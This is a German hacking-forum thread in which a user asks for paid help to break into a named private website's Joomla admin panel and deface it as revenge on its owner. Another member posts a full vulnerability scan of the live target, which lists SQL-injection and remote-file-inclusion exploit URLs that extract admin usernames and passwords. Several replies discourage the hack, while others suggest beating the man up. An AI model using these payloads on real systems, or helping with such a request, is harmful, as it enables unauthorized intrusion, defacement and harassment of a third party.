Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Ist dieses Forum vuln?

- - - - -

  • Bitte melde dich an um zu Antworten
12 Antworten in diesem Thema

#1
CBeT

CBeT

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 2 Beiträge
  • 0 Bedankt

Guten Tag : )

bräuchte mal kurz die Hilfe eines Experten.

Und zwar geht es um diese Seite: www.mois931.de

Habe ein paar Exploits getestet aber komme nicht so wirklich weiter.

Adminpanel ist unverändert unter /Administrator/index.php

Hätte gerne mal zugriff auf die Seite da ich ein paar Probleme mit ihm habe,

möchte gar nicht viel weiter ausschweifen jedoch würde jeder von euch es verstehen wenn ein

19 Jähriger Jugendlicher mit Bonzen Eltern einen auf Gangsterrappel macht  14 Jährige Mädchen abfüllt zum ficken 

überredet und entjungfert. Würde einfach mal gerne die Wahrheit über ihn auf seine Seite schreiben.

 

Wenn sich jemand findet der mir Hilft und alles klappt wäre ich natürlich auch bereit ein wenig dafür zu zahlen.

 

Schönen Tag noch

MfG

 

CBeT


Bearbeitet von CBeT, 22 February 2015 - 15:12 Uhr.


#2
SonnyBlack

SonnyBlack

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    1
  • 15 Beiträge
  • 0 Bedankt

ich habe mal gehört man kann eine Seite hacken die auf dem gleichen Server liegt 

um dann den Server zu übernehmen und dann kannst du die eigentliche Ziel Seite hacken

stimmt das so?



#3
R3s1stanc3

R3s1stanc3

    Hacktivist

  • Premium Member
  • Likes
    22
  • 72 Beiträge
  • 4 Bedankt
  • 687249355
  • Android [root]
  • Linux

Hier mal ein Joomscan. Vllt hilft es dir weiter:

$ joomscan -c "********" -u "www.mois931.de"


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.  
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||      
 ''|...|'      |   |     .|.  .||. |'....|'  .||.     
    
 
=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4  
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: http://www.mois931.de

Server: Apache/2.2.29 (Unix)
X-Powered-By: PHP/5.3.29


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.  
Vulnerable? N/A

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 7
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 8
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 9
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 10
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 11
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 12
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? N/A

# 13
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 14
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 15
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 16
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 17
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 18
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 19
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 20
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 21
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 22
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

# 23
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? N/A

# 24
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 25
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 26
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? N/A

# 27
Info -> Component: Com Profiler Blind SQL Injection    Vulnerability
Versions Affected: 1.0 RC2 <=
Check: /components/com_comprofiler/
Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Vulnerable? No

# 28
Info -> Component: Community Builder Component File Inclusion Vulnerability
Versions Affected: 1.0<=
Check: /administrator/components/com_comprofiler/plugin.class.php
Exploit: /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Vulnerable? No

# 29
Info -> Component: Com Profiler Blind SQL Injection    Vulnerability
Versions effected: 1.0 RC2 and older
Check: /administrator/components/com_comprofiler/
Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Vulnerable? No

# 30
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 31
Info -> Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_kunena/
Exploit: /index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
Vulnerable? No

# 32
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 33
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 34
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A

There is a vulnerable point in 34 found entries!

~[*] Time Taken: 5 min and 39 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net


#4
most_uniQue

most_uniQue

    AV Agent

  • Premium Member
  • Likes
    228
  • 478 Beiträge
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS

Joomscan ist leider total oudated.


Eingefügtes Bild


#5
R3s1stanc3

R3s1stanc3

    Hacktivist

  • Premium Member
  • Likes
    22
  • 72 Beiträge
  • 4 Bedankt
  • 687249355
  • Android [root]
  • Linux

Hab ich auch gesehen. Aber es ist ein Anfang :)



#6
Avni

Avni

    1337

  • Elite Member
  • Likes
    87
  • 402 Beiträge
  • 142 Bedankt

Oder du gehst einfach hin und haust ihm ordentlich auf die Fresse bevor du hier einen auf " Lass die Mädels in Ruhe sonst hack ich deine Seite hihihihi" machst...

 

Entweder man hat die Eier in der Hose oder nicht...



#7
SonnyBlack

SonnyBlack

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    1
  • 15 Beiträge
  • 0 Bedankt

das stimmt schon

außerdem hat dieser möchtegern Rapper sich sowieso selbst blamiert :D

trotzdem ist das ein Hackerboard und es sind ja laut scann Lücken auf der Seite 

also warum ihm nicht helfen ?

 

acunetix ist glaub ich ein aktueller Scanner



#8
DR.zydz

DR.zydz

    Altes Haus

  • Elite Member
  • Likes
    234
  • 258 Beiträge
  • 430 Bedankt
  • 631033078
  • Android [root]
  • Windows, Linux

Ist der Thread hier ernst gemeint? Ich habe selten so eine Scheiße gelesen!

 

Warum gehst du nicht mal vernünftig an die Sache ran, anstatt das Ganze hintenrum zu "lösen"? Wie schon gesagt wurde: Sage ihm deine Meinung, hol die Bullen, informiere die Eltern oder was weiß ich. Aber mit so einer "Anfrage" á la: Der Typ geht mir aufn Sack; kann bitte jemand mal seinen riesen E-Penis auspacken und ihm damit in Gesicht klatschen...?

 

PS: Du hast das beste H4XX0rto0l noch nicht verwendet: BR41n.exe v0.9


  • Becks, Framerater, Crap und 2 anderen gefällt das

Dzu5d.jpg

 

DHHC


Thanked by 1 Member:

#9
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

trotzdem ist das ein Hackerboard und es sind ja laut scann Lücken auf der Seite 

 

könnten auch false positives sein, hab's jetzt aber nicht selbst getestet. Falls hier jemand für dich die Seite offline nimmt bzw. Zugang knackt, was genau hast du dann gewonnen? Wenn er weiß, dass "du" dahinter steckst, verpfeift er dich bei den Bullen und wenn er es nicht weiß...ähm, noch mal: was genau hast du dann gewonnen?



#10
CBeT

CBeT

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 2 Beiträge
  • 0 Bedankt

Ist der Thread hier ernst gemeint? Ich habe selten so eine Scheiße gelesen!

 

Warum gehst du nicht mal vernünftig an die Sache ran, anstatt das Ganze hintenrum zu "lösen"? Wie schon gesagt wurde: Sage ihm deine Meinung, hol die Bullen, informiere die Eltern oder was weiß ich. Aber mit so einer "Anfrage" á la: Der Typ geht mir aufn Sack; kann bitte jemand mal seinen riesen E-Penis auspacken und ihm damit in Gesicht klatschen...?

 

PS: Du hast das beste H4XX0rto0l noch nicht verwendet: BR41n.exe v0.9

So mein lieber "Experte", das hier ist doch ein Hacker bzw. Security-Forum oder? Und ich habe hier um Hilfe gebeten.

Persönlich kläre ich die Sache mit ihm auch selbstverständlich auch noch, jedoch ist das hier auch kein RL-Crime Forum oder?

Selten so ein scheiß gelesen? Wir wissen doch alle was die Polizei bei solchen Angelegenheiten macht.. Vorausgesetzt die Mädels trauen sich eine Aussage zu machen. Ich werde ihm auf jeden Fall die Lektion seines Lebens erteilen. Privat wie auf seiner Rapper "Karriere". Privat kann ich selber klären, jedoch um die Allgemeinheit zu informieren was er für ein kleiner verlogener Nuttenbengel ist, da brauche ich Hilfe. Falls ich hier keine finde, finde ich eben auf dem nächsten Board jemand, mir relativ egal.

Also mein Freund / Experte, denk bitte nach bevor die kommentierst.

 

Mit freundlichen Grüßen  




Oder du gehst einfach hin und haust ihm ordentlich auf die Fresse bevor du hier einen auf " Lass die Mädels in Ruhe sonst hack ich deine Seite hihihihi" machst...

 

Entweder man hat die Eier in der Hose oder nicht...

 

glaube das ist nicht mein problem, aber durch sein Krankenhaus Aufenthalt erfährt niemand sein wahres Gesicht.

 

Mit freundlichen Grüßen 

 

//sorry für doppelpost


Bearbeitet von CBeT, 26 February 2015 - 18:38 Uhr.


#11
Goooofy

Goooofy

    Noob

  • Banned
  • PIPPIP
  • Likes
    3
  • 14 Beiträge
  • 0 Bedankt

Ich will dir nicht dein Spaß vertreiben. Aber wenn du schon im Internet unterwegs bist solltest du auf deine Anonymität Acht geben, CBeT.


Bearbeitet von Goooofy, 26 February 2015 - 16:50 Uhr.


#12
SonnyBlack

SonnyBlack

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    1
  • 15 Beiträge
  • 0 Bedankt

exif bust :D



#13
DR.zydz

DR.zydz

    Altes Haus

  • Elite Member
  • Likes
    234
  • 258 Beiträge
  • 430 Bedankt
  • 631033078
  • Android [root]
  • Windows, Linux

So mein lieber "Experte", das hier ist doch ein Hacker bzw. Security-Forum oder? Und ich habe hier um Hilfe gebeten.

Persönlich kläre ich die Sache mit ihm auch selbstverständlich auch noch, jedoch ist das hier auch kein RL-Crime Forum oder?

Selten so ein scheiß gelesen? Wir wissen doch alle was die Polizei bei solchen Angelegenheiten macht.. Vorausgesetzt die Mädels trauen sich eine Aussage zu machen. Ich werde ihm auf jeden Fall die Lektion seines Lebens erteilen. Privat wie auf seiner Rapper "Karriere". Privat kann ich selber klären, jedoch um die Allgemeinheit zu informieren was er für ein kleiner verlogener Nuttenbengel ist, da brauche ich Hilfe. Falls ich hier keine finde, finde ich eben auf dem nächsten Board jemand, mir relativ egal.

Also mein Freund / Experte, denk bitte nach bevor die kommentierst.

 

Mit freundlichen Grüßen  


 

glaube das ist nicht mein problem, aber durch sein Krankenhaus Aufenthalt erfährt niemand sein wahres Gesicht.

 

Mit freundlichen Grüßen 

 

//sorry für doppelpost

Glaube mir bitte, dass ich ganz genau nachdenke, bevor ich etwas poste. Wenn du der Meinung bist den rechten Arm der Gerechtigkeit spielen zu müssen, dann tue dies, aber dann solltest du das im RL machen, da dir im Cyberspace anscheinend die Mittel, das Wissen und ein Batmobil fehlt.

 

Zum Thema: Wenn du mit de Scannern keine Lücke findest und dich auf soche Programme verlassen musst, dann sehe ich da schwarz. Besser wäre es jemanden damit zu beauftragen (nein, kein Scherz)


Dzu5d.jpg

 

DHHC




Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 99 user(s)


    , , ¥akuza112, and6578, ASR, Avni, B1nary, Bad Grandpa, Becks, BlackZetsu, Bojka, bones, Born2Hack, Bot4ng, breidi59, bumg2, Bypass, caspR, CBeT, Ch!ller, clusterhead, confick.ini, cooky1, Cranky, Crap, Cube, DarKdb, daten, desmond, Dmtr, DR.zydz, easysurfer, eXalT, FalkE, Framerater, frechdax, FuchsX, G0rki, Goooofy, gtawelt, gutzuu, hacked, Hanfsalat, holz96, ice, Injection, Irhabi, Janjij, johny758, Juri, kadama, kakao1, kalixa, keyb0ardz, KrankenHaus, Kryptonit, lion., lNobodyl, loken, lolorollo, Lopus, m1dge2, Mantrayana, mettbrot, Miyaca, most_uniQue, Mr_NiceGuy, nibble nibble, nischke, NoBack3, NoName1618, NoNameMT, Norky, notfound, Nova, Orange, Osed28, PaulaAbdul, pdr0, PHIPU, Platin, pr0legend, R3s1stanc3, RellicX, SAR, Sharky, smc2014, SonnyBlack, TheAvenger, Tittler, Unkiii, x.jh7b, Xenio, Xenos88, XoiL, Xpit, ZechenKind, zepsus, zero.k
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.